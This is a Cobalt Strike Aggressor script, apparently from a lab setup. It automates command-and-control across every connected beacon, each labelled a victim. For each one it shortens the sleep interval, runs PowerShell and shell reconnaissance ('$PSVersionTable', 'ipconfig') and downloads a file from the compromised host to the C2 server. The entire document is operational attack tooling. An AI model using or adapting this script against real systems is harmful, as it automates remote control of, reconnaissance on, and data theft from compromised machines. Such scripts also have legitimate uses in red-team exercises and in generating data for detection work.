on ready {
  println("[Ready]" . formatDate("yyyy.MM.dd HH:mm:ss z") . " Existing listeners: " . listeners() . "\n");
  println("[Ready]" . formatDate("yyyy.MM.dd HH:mm:ss z") . " Existing beacons: " . beacons() . "\n");
  foreach $vic (beacons()) {
    $victim = $vic['id'];
    println('Target beacon ID: ' . $victim);
    blog($victim, 'Start C2 scripts ...');
    bsleep($victim, 17);
    bpowershell($victim, '$PSVersionTable');
    bshell($victim, 'ipconfig');
    bdownload($victim, 'C:\\vagrant\\cobaltstrike-4.4.zip');
  }
}
